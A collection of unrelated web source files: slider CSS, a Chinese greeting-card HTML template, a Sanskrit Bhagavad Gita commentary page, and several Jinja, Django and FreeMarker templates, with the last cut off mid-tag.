div#nextend-smart-slider-4 .sliderfont7 a:LINK, div#nextend-smart-slider-4 .sliderfont7 a:VISITED, div#nextend-smart-slider-4 .sliderfont7 a:FOCUS, div#nextend-smart-slider-4 .sliderfont7 a:ACTIVE { background: none; color: #ffffff;font-size:100%;text-shadow: 0px 1px 1px RGBA(0,0,0,0.78);font-family: 'Open Sans',Arial;line-height: 1.2;font-weight: normal;font-style: normal;text-decoration: none;text-align: left;-moz-transition: padding-left 0.4s ease;-webkit-transition: padding-left 0.4s ease;-o-transition: padding-left 0.4s ease;transition: padding-left 0.4s ease;padding-left: 0px; } div#nextend-smart-slider-4 .sliderfont7 a:HOVER { background: none; color: #ffffff;font-size:100%;text-shadow: 0px 1px 1px RGBA(0,0,0,0.78);font-family: 'Open Sans',Arial;line-height: 1.2;font-weight: normal;font-style: normal;text-decoration: none;text-align: left;-moz-transition: padding-left 0.4s ease;-webkit-transition: padding-left 0.4s ease;-o-transition: padding-left 0.4s ease;transition: padding-left 0.4s ease;padding-left: 0px; } div#nextend-smart-slider-4 .sliderfont8 { color: #000000;color: RGBA(0,0,0,0.86);font-size:90%;text-shadow: 0px 1px 0px RGBA(255,255,255,0.2);font-family: 'Open Sans',Arial;line-height: 1.1;font-weight: normal;font-style: normal;text-decoration: none;text-align: left;-moz-transition: padding-left 0.4s ease;-webkit-transition: padding-left 0.4s ease;-o-transition: padding-left 0.4s ease;transition: padding-left 0.4s ease;padding-left: 0px; } div#nextend-smart-slider-4 .sliderfont8 a, div#nextend-smart-slider-4 .sliderfont8 a:LINK, div#nextend-smart-slider-4 .sliderfont8 a:VISITED, div#nextend-smart-slider-4 .sliderfont8 a:FOCUS, div#nextend-smart-slider-4 .sliderfont8 a:ACTIVE { background: none; color: #000000;color: RGBA(0,0,0,0.86);font-size:100%;text-shadow: 0px 1px 0px RGBA(255,255,255,0.2);font-family: 'Open Sans',Arial;line-height: 1.1;font-weight: normal;font-style: normal;text-decoration: none;text-align: left;-moz-transition: padding-left 0.4s ease;-webkit-transition: padding-left 0.4s ease;-o-transition: padding-left 0.4s ease;transition: padding-left 0.4s ease;padding-left: 0px; } div#nextend-smart-slider-4 .sliderfont8 a:HOVER { background: none; color: #000000;color: RGBA(0,0,0,0.86);font-size:100%;text-shadow: 0px 1px 0px RGBA(255,255,255,0.2);font-family: 'Open Sans',Arial;line-height: 1.1;font-weight: normal;font-style: normal;text-decoration: none;text-align: left;-moz-transition: padding-left 0.4s ease;-webkit-transition: padding-left 0.4s ease;-o-transition: padding-left 0.4s ease;transition: padding-left 0.4s ease;padding-left: 0px; } div#nextend-smart-slider-4 .sliderfont9 { color: #ffffff;font-size:140%;text-shadow: 0px 1px 1px RGBA(0,0,0,0.78);font-family: 'Pacifico',Arial;line-height: 1.3;font-weight: normal;font-style: normal;text-decoration: none;text-align: left;-moz-transition: padding-left 0.4s ease;-webkit-transition: padding-left 0.4s ease;-o-transition: padding-left 0.4s ease;transition: padding-left 0.4s ease;padding-left: 0px; } div#nextend-smart-slider-4 .sliderfont9 a, div#nextend-smart-slider-4 .sliderfont9 a:LINK, div#nextend-smart-slider-4 .sliderfont9 a:VISITED, div#nextend-smart-slider-4 .sliderfont9 a:FOCUS, div#nextend-smart-slider-4 .sliderfont9 a:ACTIVE { background: none; color: #ffffff;font-size:100%;text-shadow: 0px 1px 1px RGBA(0,0,0,0.78);font-family: 'Pacifico',Arial;line-height: 1.3;font-weight: normal;font-style: normal;text-decoration: none;text-align: left;-moz-transition: padding-left 0.4s ease;-webkit-transition: padding-left 0.4s ease;-o-transition: padding-left 0.4s ease;transition: padding-left 0.4s ease;padding-left: 0px; } div#nextend-smart-slider-4 .sliderfont9 a:HOVER { background: none; color: #ffffff;font-size:100%;text-shadow: 0px 1px 1px RGBA(0,0,0,0.78);font-family: 'Pacifico',Arial;line-height: 1.3;font-weight: normal;font-style: normal;text-decoration: none;text-align: left;-moz-transition: padding-left 0.4s ease;-webkit-transition: padding-left 0.4s ease;-o-transition: padding-left 0.4s ease;transition: padding-left 0.4s ease;padding-left: 0px; } div#nextend-smart-slider-4 .sliderfont10 { color: #000000;color: RGBA(0,0,0,0.86);font-size:140%;text-shadow: 0px 1px 0px RGBA(255,255,255,0.2);font-family: 'Pacifico',Arial;line-height: 1.3;font-weight: normal;font-style: normal;text-decoration: none;text-align: left;-moz-transition: padding-left 0.4s ease;-webkit-transition: padding-left 0.4s ease;-o-transition: padding-left 0.4s ease;transition: padding-left 0.4s ease;padding-left: 0px; } div#nextend-smart-slider-4 .sliderfont10 a, div#nextend-smart-slider-4 .sliderfont10 a:LINK, div#nextend-smart-slider-4 .sliderfont10 a:VISITED, div#nextend-smart-slider-4 .sliderfont10 a:FOCUS, div#nextend-smart-slider-4 .sliderfont10 a:ACTIVE { background: none; color: #000000;color: RGBA(0,0,0,0.86);font-size:100%;text-shadow: 0px 1px 0px RGBA(255,255,255,0.2);font-family: 'Pacifico',Arial;line-height: 1.3;font-weight: normal;font-style: normal;text-decoration: none;text-align: left;-moz-transition: padding-left 0.4s ease;-webkit-transition: padding-left 0.4s ease;-o-transition: padding-left 0.4s ease;transition: padding-left 0.4s ease;padding-left: 0px; } div#nextend-smart-slider-4 .sliderfont10 a:HOVER { background: none; color: #000000;color: RGBA(0,0,0,0.86);font-size:100%;text-shadow: 0px 1px 0px RGBA(255,255,255,0.2);font-family: 'Pacifico',Arial;line-height: 1.3;font-weight: normal;font-style: normal;text-decoration: none;text-align: left;-moz-transition: padding-left 0.4s ease;-webkit-transition: padding-left 0.4s ease;-o-transition: padding-left 0.4s ease;transition: padding-left 0.4s ease;padding-left: 0px; } div#nextend-smart-slider-4 .sliderfont11 { color: #ffffff;font-size:100%;text-shadow: 0px 1px 1px RGBA(0,0,0,0.78);font-family: 'Open Sans',Arial;line-height: 1.3;font-weight: normal;font-style: normal;text-decoration: none;text-align: center;-moz-transition: padding-left 0.4s ease;-webkit-transition: padding-left 0.4s ease;-o-transition: padding-left 0.4s ease;transition: padding-left 0.4s ease;padding-left: 0px; } div#nextend-smart-slider-4 .sliderfont11 a, div#nextend-smart-slider-4 .sliderfont11 a:LINK, div#nextend-smart-slider-4 .sliderfont11 a:VISITED, div#nextend-smart-slider-4 .sliderfont11 a:FOCUS, div#nextend-smart-slider-4 .sliderfont11 a:ACTIVE { background: none; color: #ffffff;font-size:100%;text-shadow: 0px 1px 1px RGBA(0,0,0,0.78);font-family: 'Open Sans',Arial;line-height: 1.3;font-weight: normal;font-style: normal;text-decoration: none;text-align: center;-moz-transition: padding-left 0.4s ease;-webkit-transition: padding-left 0.4s ease;-o-transition: padding-left 0.4s ease;transition: padding-left 0.4s ease;padding-left: 0px; } div#nextend-smart-slider-4 .sliderfont11 a:HOVER { background: none; color: #ffffff;font-size:100%;text-shadow: 0px 1px 1px RGBA(0,0,0,0.78);font-family: 'Open Sans',Arial;line-height: 1.3;font-weight: normal;font-style: normal;text-decoration: none;text-align: center;-moz-transition: padding-left 0.4s ease;-webkit-transition: padding-left 0.4s ease;-o-transition: padding-left 0.4s ease;transition: padding-left 0.4s ease;padding-left: 0px; } div#nextend-smart-slider-4 .sliderfont12 { color: #000000;color: RGBA(0,0,0,0.86);font-size:100%;text-shadow: 0px 1px 0px RGBA(255,255,255,0.2);font-family: 'Open Sans',Arial;line-height: 1.3;font-weight: normal;font-style: normal;text-decoration: none;text-align: center;-moz-transition: padding-left 0.4s ease;-webkit-transition: padding-left 0.4s ease;-o-transition: padding-left 0.4s ease;transition: padding-left 0.4s ease;padding-left: 0px; } div#nextend-smart-slider-4 .sliderfont12 a, div#nextend-smart-slider-4 .sliderfont12 a:LINK, div#nextend-smart-slider-4 .sliderfont12 a:VISITED, div#nextend-smart-slider-4 .sliderfont12 a:FOCUS, div#nextend-smart-slider-4 .sliderfont12 a:ACTIVE { background: none; color: #000000;color: RGBA(0,0,0,0.86);font-size:100%;text-shadow: 0px 1px 0px RGBA(255,255,255,0.2);font-family: 'Open Sans',Arial;line-height: 1.3;font-weight: normal;font-style: normal;text-decoration: none;text-align: center;-moz-transition: padding-left 0.4s ease;-webkit-transition: padding-left 0.4s ease;-o-transition: padding-left 0.4s ease;transition: padding-left 0.4s ease;padding-left: 0px; } div#nextend-smart-slider-4 .sliderfont12 a:HOVER { background: none; color: #000000;color: RGBA(0,0,0,0.86);font-size:100%;text-shadow: 0px 1px 0px RGBA(255,255,255,0.2);font-family: 'Open Sans',Arial;line-height: 1.3;font-weight: normal;font-style: normal;text-decoration: none;text-align: center;-moz-transition: padding-left 0.4s ease;-webkit-transition: padding-left 0.4s ease;-o-transition: padding-left 0.4s ease;transition: padding-left 0.4s ease;padding-left: 0px; } div#nextend-smart-slider-4 .sliderfontcustom1 { color: #1abc9c;font-size:360%;text-shadow: 0px 1px 1px RGBA(0,0,0,0.78);font-family: 'Pacifico',Arial;line-height: 1.3;font-weight: normal;font-style: normal;text-decoration: none;text-align: left;-moz-transition: padding-left 0.4s ease;-webkit-transition: padding-left 0.4s ease;-o-transition: padding-left 0.4s ease;transition: padding-left 0.4s ease;padding-left: 0px; } div#nextend-smart-slider-4 .sliderfontcustom1 a, div#nextend-smart-slider-4 .sliderfontcustom1 a:LINK, div#nextend-smart-slider-4 .sliderfontcustom1 a:VISITED, div#nextend-smart-slider-4 .sliderfontcustom1 a:FOCUS, div#nextend-smart-slider-4 .sliderfontcustom1 a:ACTIVE { background: none; color: #1abc9c;font-size:100%;text-shadow: 0px 1px 1px RGBA(0,0,0,0.78);font-family: 'Pacifico',Arial;line-height: 1.3;font-weight: normal;font-style: normal;text-decoration: none;text-align: left;-moz-transition: padding-left 0.4s ease;-webkit-transition: padding-left 0.4s ease;-o-transition: padding-left 0.4s ease;transition: padding-left 0.4s ease;padding-left: 0px; } div#nextend-smart-slider-4 .sliderfontcustom1 a:HOVER { background: none; color: #1abc9c;font-size:100%;text-shadow: 0px 1px 1px RGBA(0,0,0,0.78);font-family: 'Pacifico',Arial;line-height: 1.3;font-weight: normal;font-style: normal;text-decoration: none;text-align: left;-moz-transition: padding-left 0.4s ease;-webkit-transition: padding-left 0.4s ease;-o-transition: padding-left 0.4s ease;transition: padding-left 0.4s ease;padding-left: 0px; } div#nextend-smart-slider-4 .sliderfontcustom2 { color: #ffffff;font-size:140%;text-shadow: 0px 1px 1px RGBA(0,0,0,0.78);font-family: 'Open Sans',Arial;line-height: 1.2;font-weight: normal;font-style: normal;text-decoration: none;text-align: center;-moz-transition: padding-left 0.4s ease;-webkit-transition: padding-left 0.4s ease;-o-transition: padding-left 0.4s ease;transition: padding-left 0.4s ease;padding-left: 0px; } div#nextend-smart-slider-4 .sliderfontcustom2 a, div#nextend-smart-slider-4 .sliderfontcustom2 a:LINK, div#nextend-smart-slider-4 .sliderfontcustom2 a:VISITED, div#nextend-smart-slider-4 .sliderfontcustom2 a:FOCUS, div#nextend-smart-slider-4 .sliderfontcustom2 a:ACTIVE { background: none; color: #ffffff;font-size:100%;text-shadow: 0px 1px 1px RGBA(0,0,0,0.78);font-family: 'Open Sans',Arial;line-height: 1.2;font-weight: normal;font-style: normal;text-decoration: none;text-align: center;-moz-transition: padding-left 0.4s ease;-webkit-transition: padding-left 0.4s ease;-o-transition: padding-left 0.4s ease;transition: padding-left 0.4s ease;padding-left: 0px; } div#nextend-smart-slider-4 .sliderfontcustom2 a:HOVER { background: none; color: #ffffff;font-size:100%;text-shadow: 0px 1px 1px RGBA(0,0,0,0.78);font-family: 'Open Sans',Arial;line-height: 1.2;font-weight: normal;font-style: normal;text-decoration: none;text-align: center;-moz-transition: padding-left 0.4s ease;-webkit-transition: padding-left 0.4s ease;-o-transition: padding-left 0.4s ease;transition: padding-left 0.4s ease;padding-left: 0px; } div#nextend-smart-slider-4 .sliderfontcustom3 { color: #1abc9c;font-size:120%;text-shadow: 0px 1px 1px RGBA(0,0,0,0.78);font-family: 'Open Sans',Arial;line-height: 1.2;font-weight: normal;font-style: normal;text-decoration: none;text-align: center;-moz-transition: padding-left 0.4s ease;-webkit-transition: padding-left 0.4s ease;-o-transition: padding-left 0.4s ease;transition: padding-left 0.4s ease;padding-left: 0px; } div#nextend-smart-slider-4 .sliderfontcustom3 a, div#nextend-smart-slider-4 .sliderfontcustom3 a:LINK, div#nextend-smart-slider-4 .sliderfontcustom3 a:VISITED, div#nextend-smart-slider-4 .sliderfontcustom3 a:FOCUS, div#nextend-smart-slider-4 .sliderfontcustom3 a:ACTIVE { background: none; color: #1abc9c;font-size:100%;text-shadow: 0px 1px 1px RGBA(0,0,0,0.78);font-family: 'Open Sans',Arial;line-height: 1.2;font-weight: normal;font-style: normal;text-decoration: none;text-align: center;-moz-transition: padding-left 0.4s ease;-webkit-transition: padding-left 0.4s ease;-o-transition: padding-left 0.4s ease;transition: padding-left 0.4s ease;padding-left: 0px; } div#nextend-smart-slider-4 .sliderfontcustom3 a:HOVER { background: none; color: #1abc9c;font-size:100%;text-shadow: 0px 1px 1px RGBA(0,0,0,0.78);font-family: 'Open Sans',Arial;line-height: 1.2;font-weight: normal;font-style: normal;text-decoration: none;text-align: center;-moz-transition: padding-left 0.4s ease;-webkit-transition: padding-left 0.4s ease;-o-transition: padding-left 0.4s ease;transition: padding-left 0.4s ease;padding-left: 0px; } div#nextend-smart-slider-4 .sliderfontcustom4 { color: #1abc9c;font-size:120%;text-shadow: 0px 1px 1px RGBA(0,0,0,0.78);font-family: 'Open Sans',Arial;line-height: 1.2;font-weight: normal;font-style: normal;text-decoration: none;text-align: right;-moz-transition: padding-left 0.4s ease;-webkit-transition: padding-left 0.4s ease;-o-transition: padding-left 0.4s ease;transition: padding-left 0.4s ease;padding-left: 0px; } div#nextend-smart-slider-4 .sliderfontcustom4 a, div#nextend-smart-slider-4 .sliderfontcustom4 a:LINK, div#nextend-smart-slider-4 .sliderfontcustom4 a:VISITED, div#nextend-smart-slider-4 .sliderfontcustom4 a:FOCUS, div#nextend-smart-slider-4 .sliderfontcustom4 a:ACTIVE { background: none; color: #1abc9c;font-size:100%;text-shadow: 0px 1px 1px RGBA(0,0,0,0.78);font-family: 'Open Sans',Arial;line-height: 1.2;font-weight: normal;font-style: normal;text-decoration: none;text-align: right;-moz-transition: padding-left 0.4s ease;-webkit-transition: padding-left 0.4s ease;-o-transition: padding-left 0.4s ease;transition: padding-left 0.4s ease;padding-left: 0px; } div#nextend-smart-slider-4 .sliderfontcustom4 a:HOVER { background: none; color: #1abc9c;font-size:100%;text-shadow: 0px 1px 1px RGBA(0,0,0,0.78);font-family: 'Open Sans',Arial;line-height: 1.2;font-weight: normal;font-style: normal;text-decoration: none;text-align: right;-moz-transition: padding-left 0.4s ease;-webkit-transition: padding-left 0.4s ease;-o-transition: padding-left 0.4s ease;transition: padding-left 0.4s ease;padding-left: 0px; } div#nextend-smart-slider-4 .nextend-widget { display: none; -webkit-backface-visibility: hidden; -webkit-perspective: 1; } div#nextend-smart-slider-4.nextend-desktop .nextend-widget-display-desktop, div#nextend-smart-slider-4.nextend-tablet .nextend-widget-display-tablet, div#nextend-smart-slider-4.nextend-phone .nextend-widget-display-phone { display: block; } div#nextend-smart-slider-4 .nextend-widget-always { -webkit-transform: translate3d(0,0,0); } div#nextend-smart-slider-4 .nextend-widget-hover { visibility: hidden; opacity: 0; -webkit-transition: opacity 0.4s ease; -moz-transition: opacity 0.4s ease; -o-transition: opacity 0.4s ease; transition: opacity 0.4s ease; } div#nextend-smart-slider-4.nextend-widget-hover-show .nextend-widget-hover { opacity: 1; } div#nextend-smart-slider-4 .smart-slider-canvas .nextend-slide-bg { position: absolute; top: 0; left: 0; width: 100%; max-width: none !important; height: auto; background: rgba(0,0,0,0.002); } div#nextend-smart-slider-4 { width: 1400px; height: 550px; float: left; } .x-rtl div#nextend-smart-slider-4 { float: right; } div#nextend-smart-slider-4 .smart-slider-border1 { position: relative; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; height: 550px; overflow: hidden; border-style: solid; border-width: 0px; border-color: #3E3E3E; border-color: RGBA(62,62,62,1); -webkit-border-top-right-radius: 0px; -webkit-border-bottom-right-radius: 0px; -webkit-border-bottom-left-radius: 0px; -webkit-border-top-left-radius: 0px; -moz-border-radius-topright: 0px; -moz-border-radius-bottomright: 0px; -moz-border-radius-bottomleft: 0px; -moz-border-radius-topleft: 0px; border-top-right-radius: 0px; border-bottom-right-radius: 0px; border-bottom-left-radius: 0px; border-top-left-radius: 0px; -moz-background-clip: padding-box; -webkit-background-clip: padding-box; background-clip: padding-box; background-repeat: repeat; background-position: 0 0; background-size: auto; } div#nextend-smart-slider-4 .smart-slider-border2 { position: relative; width: 100%; height: 100%; -webkit-border-top-right-radius: 0px; -webkit-border-bottom-right-radius: 0px; -webkit-border-bottom-left-radius: 0px; -webkit-border-top-left-radius: 0px; -moz-border-radius-topright: 0px; -moz-border-radius-bottomright: 0px; -moz-border-radius-bottomleft: 0px; -moz-border-radius-topleft: 0px; border-top-right-radius: 0px; border-bottom-right-radius: 0px; border-bottom-left-radius: 0px; border-top-left-radius: 0px; -moz-background-clip: padding-box; -webkit-background-clip: padding-box; background-clip: padding-box; overflow: hidden; } .x-firefox div#nextend-smart-slider-4 .smart-slider-border2 { opacity: 0.99999; } div#nextend-smart-slider-4 .smart-slider-canvas { position: absolute; top: 0; left: 0; width: 1400px; height: 550px; z-index: 2; display: block; -webkit-backface-visibility: hidden; } div#nextend-smart-slider-4 .smart-slider-canvas-inner { position: relative; width: 1400px; height: 550px; } div#nextend-smart-slider-4 .smart-slider-slide-active { z-index: 3; } div#nextend-smart-slider-4 .smart-slider-layer { position: absolute; } div#nextend-smart-slider-4 .nextend-flux { position: absolute; top: 0; left: 0; width: 100%; height: 100%; z-index: 1; } div#nextend-smart-slider-4 .nextend-flux img { max-width: none !important; opacity: 0.999; } div#nextend-smart-slider-4 .current { border: 0; padding: 0; } div#nextend-smart-slider-4.nextend-slider-fadeload{position: absolute; opacity: 0;}
order/source/modules/sheka/template/mobile/temp/233.html
JoelPub/wordpress-amazon
<!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="viewport" content="width=device-width,initial-scale=1.0,user-scalable=no" /> <title>周末问候</title> <style> html { height: 100%; margin: 0; padding: 0; } body { margin: 0; padding: 0; height: 100%; font-size: 18px; line-height: 1.3em; } #stage { position: absolute; top: 0px; left: 0px; width: 100%; height: 100%; overflow: hidden; } #cardTo { visibility: hidden; } #cardBody { margin: 10px 0px; visibility: hidden; overflow: hidden; height: auto; overflow-y:scroll; } #cardFrom { float: right; margin-right: 10px; visibility: hidden; } #stage.bg { background-image: url("{$_W['attachurl']}{$data['cardbg']}"); background-repeat: no-repeat; background-size: 100% 100%; } #contentPanel { position: absolute; top: 55%; left: 10%; width: 80%; height: 35%; color:#fff; font-weight:bold; } </style><script type="text/javascript">var APP_PUBLIC = "./source/modules/sheka/";</script> <script src="http://libs.baidu.com/jquery/2.0.3/jquery.min.js"></script> <script src="./source/modules/sheka/js/common.js"></script> <script> $(function () { waitReady(); var cardtoHeight = $("#cardTo").height(); var cardFromHeight = $("#cardFrom").height(); var panelHeight = $("#contentPanel").height(); var cardBody = $("#cardBody"); var lineheight = parseInt(cardBody.css("line-height")); var bodyHeight = panelHeight - cardtoHeight - cardFromHeight; cardBody.css({ "max-height": parseInt(bodyHeight / lineheight) * lineheight + "px" }); var speed = 100; var time = cardBody.html().length * speed; var timeto=$("#cardTo").html().length*speed; $("body").delay(500).show(function () { $("#cardTo").typewriter(speed); }).delay(timeto+500).show(function () { $("#cardBody").typewriter(speed); }).delay(time+500).show(function () { $("#cardFrom").typewriter(speed); $("#cardFrom").ShowSkip(); }); }); </script> </head> <body> <script> CreateAudio("{$_W['attachurl']}{$data['music']}"); //播放音频 </script> <div id="stage" class="bg"> <div id="contentPanel"> <div id="cardTo">老王:</div> <div id="cardBody"> 花儿累了所以它放弃了美丽选择了果实,天空累了所以它放弃太阳选择了月亮,忙碌一周的您感觉累吗?周末了,好好休息、放松心情,保重身体!</div> <div id="cardFrom">浦泽</div> <script type="text/javascript"> ReplaceText(); </script> </div> </div> </body> </html>
wp-content/themes/andyhuntdesign/css/scroll.css
AndyHuntDesign/andyhuntdesign
@CHARSET "ISO-8859-1"; /* Reset CSS * --------------------------------------- */ body,div,dl,dt,dd,ul,ol,li,h1,h2,h3,h4,h5,h6,pre, form,fieldset,input,textarea,p,blockquote,th,td { padding: 0; margin: 0; } a{ text-decoration:none; } table { border-spacing: 0; } fieldset,img { border: 0; } address,caption,cite,code,dfn,em,strong,th,var { font-weight: normal; font-style: normal; } strong{ font-weight: bold; } ol,ul { list-style: none; margin:0; padding:0; } caption,th { text-align: left; } h1,h2,h3,h4,h5,h6 { font-weight: normal; font-size: 100%; margin:0; padding:0; color:#444; } q:before,q:after { content:''; } abbr,acronym { border: 0; } /* Custom CSS * --------------------------------------- */ body{ font-family: arial,helvetica; color: #333; color: rgba(0,0,0,0.5); } .wrap{ margin-left: auto; margin-right: auto; width: 960px; position: relative; } h1{ font-size: 6em; } p{ font-size: 2em; } .intro p{ /*width: 50%;*/ margin: 0 auto; } .section{ text-align:center; } #menu li { display:inline-block; margin: 10px; color: #000; background:#fff; background: rgba(255,255,255, 0.5); -webkit-border-radius: 10px; border-radius: 10px; } #menu li.active{ background:#666; background: rgba(0,0,0, 0.5); color: #fff; } #menu li a{ text-decoration:none; color: #000; } #menu li.active a:hover{ color: #000; } #menu li:hover{ background: rgba(255,255,255, 0.8); } #menu li a, #menu li.active a{ padding: 9px 18px; display:block; } #menu li.active a{ color: #fff; } #menu{ position:fixed; top:0; left:0; height: 40px; z-index: 70; width: 100%; padding: 0; margin:0; } .twitter-share-button{ position: fixed; z-index: 99; right: 149px; top: 9px; } #download{ margin: 10px 0 0 0; padding: 15px 10px; color: #fff; text-shadow: 0 -1px 0 rgba(0,0,0,0.25); background-color: #49afcd; background-image: -moz-linear-gradient(top, #5bc0de, #2f96b4); background-image: -ms-linear-gradient(top, #5bc0de, #2f96b4); background-image: -webkit-gradient(linear,0 0,0 100%,from( #5bc0de),to( #2f96b4)); background-image: -webkit-linear-gradient(top, #5bc0de, #2f96b4); background-image: -o-linear-gradient(top, #5bc0de, #2f96b4); background-image: linear-gradient(top, #5bc0de, #2f96b4); background-repeat: repeat-x; filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#5bc0de', endColorstr='#2f96b4', GradientType=0); border-color: #2f96b4 #2f96b4 #1f6377; border-color: rgba(0,0,0,.1) rgba(0,0,0,.1) rgba(0,0,0,.25); filter: progid:DXImageTransform.Microsoft.gradient(enabled=false); -webkit-border-radius: 6px; -moz-border-radius: 6px; border-radius: 6px; vertical-align: middle; cursor: pointer; display: inline-block; -webkit-box-shadow: inset 0 1px 0 rgba(255,255,255,0.2),0 1px 2px rgba(0,0,0,0.05); -moz-box-shadow: inset 0 1px 0 rgba(255,255,255,0.2),0 1px 2px rgba(0,0,0,0.05); box-shadow: inset 0 1px 0 rgba(255,255,255,0.2),0 1px 2px rgba(0,0,0,0.05); } #download a{ text-decoration:none; color:#fff; } #download:hover{ text-shadow: 0 -1px 0 rgba(0,0,0,.25); background-color: #2F96B4; background-position: 0 -15px; -webkit-transition: background-position .1s linear; -moz-transition: background-position .1s linear; -ms-transition: background-position .1s linear; -o-transition: background-position .1s linear; transition: background-position .1s linear; } #infoMenu{ height: 20px; color: #f2f2f2; position:fixed; z-index:70; bottom:0; width:100%; text-align:right; font-size:0.9em; padding:8px 0 8px 0; } #infoMenu ul{ padding: 0 40px; } #infoMenu li a{ display: block; margin: 0 22px 0 0; color: #333; } #infoMenu li a:hover{ text-decoration:underline; } #infoMenu li{ display:inline-block; position:relative; } #examplesList{ display:none; background: #282828; -webkit-border-radius: 6px; -moz-border-radius: 6px; border-radius: 6px; padding: 20px; float: left; position: absolute; bottom: 29px; right: 0; width:638px; text-align:left; } #examplesList ul{ padding:0; } #examplesList ul li{ display:block; margin: 5px 0; } #examplesList ul li a{ color: #BDBDBD; margin:0; } #examplesList ul li a:hover{ color: #f2f2f2; } #examplesList .column{ float: left; margin: 0 20px 0 0; } #examplesList h3{ color: #f2f2f2; font-size: 1.2em; margin: 0 0 15px 0; border-bottom: 1px solid rgba(0, 0, 0, 0.4); -webkit-box-shadow: 0 1px 0 rgba(255, 255, 255, 0.1); -moz-box-shadow: 0 1px 0 rgba(255,255,255,0.1); box-shadow: 0 1px 0 rgba(255, 255, 255, 0.1); padding: 0 0 5px 0; } /* Demos Menu * --------------------------------------- */ #demosMenu{ position:fixed; bottom: 10px; right:10px; z-index: 999; }
app/src/main/assets/html/sa/BG_C11_V48.html
SrirangaDigital/shankara-android
<html> <head> <meta charset="UTF-8"> <link rel="stylesheet" href="assets/stylesheet-sa.css" /> </head> <body> <div class='verse' id='BG_C11_V48' type='shloka'> <div class='leading_bhashya' id='BG_C11_V48_I01'>आत्मनः मम रूपदर्शनेन कृतार्थ एव त्वं संवृत्तः इति तत् स्तौति —</div> <div class='versetext'>न वेदयज्ञाध्ययनैर्न दानैर्न च क्रियाभिर्न तपोभिरुग्रैः । <br/>एवंरूपः शक्य अहं नृलोके द्रष्टुं त्वदन्येन कुरुप्रवीर ॥ ४८ ॥ </div> <div class='bhashya' id='BG_C11_V48_B01'>न वेदयज्ञाध्ययनैः चतुर्णामपि वेदानाम् अध्ययनैः यथावत् यज्ञाध्ययनैश्च — वेदाध्ययनैरेव यज्ञाध्ययनस्य सिद्धत्वात् पृथक् यज्ञाध्ययनग्रहणं यज्ञविज्ञानोपलक्षणार्थम् — तथा न दानैः तुलापुरुषादिभिः, न च क्रियाभिः अग्निहोत्रादिभिः श्रौतादिभिः, न अपि तपोभिः उग्रैः चान्द्रायणादिभिः उग्रैः घोरैः, एवंरूपः यथादर्शितं विश्वरूपं यस्य सोऽहम् एवंरूपः न शक्यः अहं नृलोके मनुष्यलोके द्रष्टुं त्वदन्येन त्वत्तः अन्येन कुरुप्रवीर ॥ ४८ ॥ </div> </div> </body> </html>
templates/prism-search.html
andreasots/qrpth.eu
{% extends "base.html" %} {% block title %}qrpth.eu - LRL chat logs - Search{% endblock %} {% block head %} <link rel="stylesheet" href="https://lrrbot.mrphlip.com/static/archive.css"> <style>.line, input { display: inline; }</style> {% endblock %} {% block main %} <p><form><input id="q" type="text" name="q" value="{{ query }}"><input type="submit" value="Search"></form></p> {% for id_, message, time in messages %} <div id="entry-{{ id_ }}"><span class="timestamp">{{ time.strftime("%Y-%m-%d %H:%M") }}</span> {{ message|safe }}</div> {% endfor %} <script> var list = document.getElementsByClassName("deleted"); for (var i = 0; i < list.length; i++) { list[i].onclick = function(e) { e.target.style.display = "none"; var sibling = e.target.nextElementSibling; while (sibling.className.indexOf("message") == -1) sibling = sibling.nextElementSibling; sibling.style.display = "inline"; }; } </script> {% endblock %}
circles/templates/circles/circle_confirm_delete.html
7Pros/circuit
{% extends 'base.html' %} {% block content %} <div class="row"> <div class="col-xs-push-0 col-sm-push-2 col-md-push-2 col-xs-12 col-sm-8 col-md-8"> <h3>Delete the circle "{{ circle.name }}"?</h3> <form method="POST" action=""> {% csrf_token %} <input type="submit" value="DELETE" class="btn btn-danger btn-raised"> <a href="{% url 'circles:manage' user_pk=request.user.pk %}" class="btn btn-default btn-raised">Cancel</a> </form> </div> </div> {% endblock %}
WebRoot/WEB-INF/jeecms_sys/message/trashbox.html
caipiao/Lottery
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <title></title> <#include "/jeecms_sys/head.html"/> <script src="${base}/res/common/js/message.js" type="text/javascript"></script> <script type="text/javascript"> function getTableForm() { return document.getElementById('tableForm'); } function optDelete() { if(Pn.checkedCount('ids')<=0) { alert("<@s.m 'error.checkRecord'/>"); return; } if(!confirm("<@s.m 'global.confirm.delete'/>")) { return; } var f = getTableForm(); f.action="o_delete.do"; f.submit(); } function toList(box) { $("#box").val(box); $("#listFrom").submit(); } </script> </head> <body> <div class="box-positon"> <div class="rpos"><@s.m "global.position"/>: <@s.m "cmsMessage.function"/> - <@s.m "cmsMessage.trashbox"/></div> <#include "inc_opt.html"/> <div class="clear"></div> </div> <div class="body-box"> <form id="tableForm" method="post"> <input type="hidden" name="pageNo" value="${pageNo!}"/> <input type="hidden" name="box" value="${box!}"/> <input type="hidden" name="msg" value="<@s.m "cmsMessage.msg"/>"/> <@p.table value=pagination;message,i,has_next><#rt/> <@p.column title="<input type='checkbox' onclick='Pn.checkbox(\"ids\",this.checked)'/>" width="20"> <input type='checkbox' name='ids' value='${message.id}' id="id_${message.id!}"/><#t/> </@p.column><#t/> <@p.column title="ID">${message.id}</@p.column><#t/> <@p.column code="cmsMessage.title"> <#if message.msgStatus> <a href="v_read.do?id=${message.id!}&&box=3"><@text_cut s=message.titleHtml len='15' append='...'/></a> <#else> <a href="v_read.do?id=${message.id!}&&box=3"><strong><@text_cut s=message.titleHtml len='15' append='...'/></strong></a> </#if> </@p.column><#t/> <@p.column code="cmsMessage.sendUser" align="center">${message.msgSendUser.username!}</@p.column><#t/> <@p.column code="cmsMessage.receiverUser" align="center">${message.msgReceiverUser.username!}</@p.column><#t/> <#if message.sendTime??> <@p.column code="cmsMessage.sendTime" align="center">${message.sendTime?string('yyyy-MM-dd HH:mm:ss')}</@p.column><#t/> <#else> <@p.column code="cmsMessage.sendTime" align="center"></@p.column><#t/> </#if> </@p.table> <div> <input class="recycle" type="button" onclick="revert()" value="<@s.m "cmsMessage.revert"/>"/> <input 